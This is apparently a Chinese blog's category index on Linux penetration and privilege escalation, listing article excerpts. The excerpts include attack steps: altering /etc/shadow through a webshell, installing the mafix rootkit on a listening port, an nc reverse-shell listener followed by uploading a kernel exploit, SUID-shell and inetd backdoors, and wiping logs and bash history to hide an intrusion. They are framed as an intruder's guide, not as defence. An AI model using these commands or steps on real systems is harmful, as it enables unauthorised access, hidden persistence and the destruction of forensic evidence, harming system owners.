随笔分类 - LINUX渗透提权
msf命令全集
摘要:一、msfconsole? 帮助菜单back 从当前环境返回banner 显示一个MSF bannercd 切换目录color 颜色转换connect 连接一个主机exit 退出MSFhelp 帮助菜单info 显示一个或多个模块的信息irb 进入irb脚本模式jobs 显示和管理作业kill 杀死...
阅读全文
利用MSF溢出攻击讲解
摘要:msf的强大之处也就不做探讨了,虽然这些东西网上很多。但我想说说我的感受。这次的演示是在BT5中远程攻击一台win2003 sp2 metasploit是4.3的需要说明的一点是 现在的BT5中不像BT4中有postgresql数据库 需要使用的须自行安装。并且现在msf在4.0以后就没有了db_a...
阅读全文
LINUX之文件操作权限讲解
摘要:r(Read,读取):对文件而言,具有读取文件内容的权限;对目录来说,具有浏览目 录的权限。 w(Write,写入):对文件而言,具有新增、修改文件内容的权限;对目录来说,具有删除、移动目录内文件的权限。x(eXecute,执行):对文件而言,具有执行文件的权限;对目录了来说该用户具有进入目录的权限。s或S(SUID,Set UID):可执行的文件搭配这个权限,便能得到特权,任意存取该文件的所有者能使用的全部系统资源。请注意具备SUID权限的文件,黑客经常利用这种权限,以SUID配上root帐号拥有者,无声无息地在系统中开扇后门,供日后进出使用。T或T(Sticky):/tmp和 /var/t
阅读全文
LINUX下渗透提权之嗅探技术
摘要:内网渗透在攻击层面,其实更趋向于社工和常规漏洞检测的结合,为了了解网内防护措施的设置是通过一步步的刺探和经验积累,有时判断出错,也能进入误 区。但是如果能在网内进行嗅探,则能事半功倍,处于一个对网内设置完全透明的状态。本文将从一个注点引发的突破,到控制整个内网的全过程来跟大家讨论,内 网的渗透嗅探术和安全防护一些内容。在寻找突破时,更多的是从应用服务来,而应用服务最直观的信息采集,就是端口扫描,不同的应用,开放的服务不一样。所以,在对网络进行信息收集时, 大概分为这样两步: 端口探测,程序指纹分析。在端口探测方面,个人喜欢用SuperScan来快速对网段里的应用进行判断,如图:在掌握端口信息后
阅读全文
php上传漏洞获root权限
摘要:首先用nmap检测一下目标网站的系统服务和一些端口banner的信息。Nmap -v -sT -sV -O -P0 -oX test.xml ***.kr21/tcp open ftp ProFTPD22/tcp open ssh OpenSSH 4.3 (protocol 2.0)25/tcp open smtp Sendmail 8.13.8/8.13.853/tcp open domain ISC BIND 9.3.4-P180/tcp open http Apache httpd135/tcp filtere...
阅读全文
LINUX提权笔记
摘要:没啥技术含量,一种思路,让某些得到root权限webshell的童鞋可以快点拿到权限。某日拿到某站webshell,RedHat 系统,Tomcat程序是root身份启动的,webshell当然也拥有root权限。1.webshell直接替换root密码: /etc/shadow // 记得备份2.允许root通过ssh登陆: /etc/ssh/sshd_configPermitRootLogin yes #允许root登陆3.重启ssh服务 service ssh restart4.以root身份登陆ssh,增加一个用户useradd applicationpasswd // 根据提示设置密
阅读全文
rootkit后门之安装流程
摘要:1.首先是获得远程服务器的root权限2.然后下载rootkit程序,本文用到的是mafix(下载前最好把杀毒软件关掉,基本上会报毒的!)3.开始安装tar -xvzf mafix.tar.gzcd mafix./root rootkit345 (其中rootkit为你连接后门程序时的密码,345为连接的端口)可以验证一下是否成功:[root@localhost ~]# netstat -anlp|grep 345tcp 0 0 0.0.0.0:345 0.0.0.0:* LISTEN 11280/ttyload可以看到,345端口已经在监听了。4.连接后门程序ssh 192.168.211.
阅读全文
LINUX提权后获取敏感信息之方法
摘要:文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。列举关键点(Linux)的提权是怎么一回事:收集–枚举,枚举和一些更多的枚举。过程–通过数据排序,分析和确定优先次序。搜索–知道搜索什么和在哪里可以找到漏洞代码。适应–自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。尝试–做好准备,试验和错误。操作类型操作类型是什么版本?cat/etc/issuecat/etc/*-releasecat/etc/lsb-releasecat/etc/redhat-release它的内核版本是什么?cat/proc/version
阅读全文
LINUX之内网渗透提权
摘要:在渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方 面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而linux却很少人用系统自带的ssh、iptables自身来处理此类问题。由于时间有限,本文只详细的介绍ssh tunnel方面的知识,iptables的有空再加上。SSH的三个端口转发命令:ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Hostssh -C -f -N -g -R
阅读全文
LINUX下使用NC反弹CMDSHELL提权
摘要:很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核2.6.18-194.11.3.el5 内核 ,这个好CentOS release 5.5的系统!找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666然后再点你shell连接成功就出现下面的内容然后百度找2.6.18-194这个内核的EXP,我已经收藏过.然后通过Webshell把EXP上传到/tmp目录下,为什么要传到这个目录呢?因为在Linux下一般tmp目录的权限
阅读全文
Linux之入侵痕迹清理总结
摘要:rm -f -r /var/log/*rm .bash_historyrm recently_used
阅读全文
MySQL使用痕迹清理~/.mysql_history
摘要:mysql会给出我们最近执行的SQL命令和脚本;同linux command保存在~/.bash_history一样,你用mysql连接MySQL server的所有操作也会被记录到~/.mysql_history文件中,这样就会有很大的安全风险了,如添加MySQL用户的sql也同样会被明文记录到此文件中。1,查看你系统的~/.mysql_history隐藏文件(我的测试环境下,一般linux的mysql用户来管理,所以在/home/mysql目录下会有这个文件)-bash-3.2$ ls -al | grep mysql_-rw------- 1 mysql mysql 5006 Apr 1
阅读全文
LINUX的两种后门总结(suid shell与inetd)
摘要:前提:你现在已经是root用户, 想留一个后门以便日后再一次进入。系统环境:1dawg:~# uname -a2Linux dawg 2.4.20-1-386#3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux1. SUID shell关于SUID位的知识,请点这里首先, 先切换成为root用户,并执行以下的命令:1dawg:~# cp /bin/bash /.woot2dawg:~# chmod 4755 /.woot3dawg:~# ls -al /.woot4-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.
阅读全文
LINUX渗透与提权总结
摘要:本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。Linux 系统下的一些常见路径:001/etc/passwd002003/etc/shadow004005/etc/fstab006007/etc/host.conf008009/etc/motd010011/etc/ld.so.conf012013/var/www/htdocs/index.php014015/var/www/conf/httpd.conf016017/var/www/htdocs/index.html018019/var/httpd/conf/php
阅读全文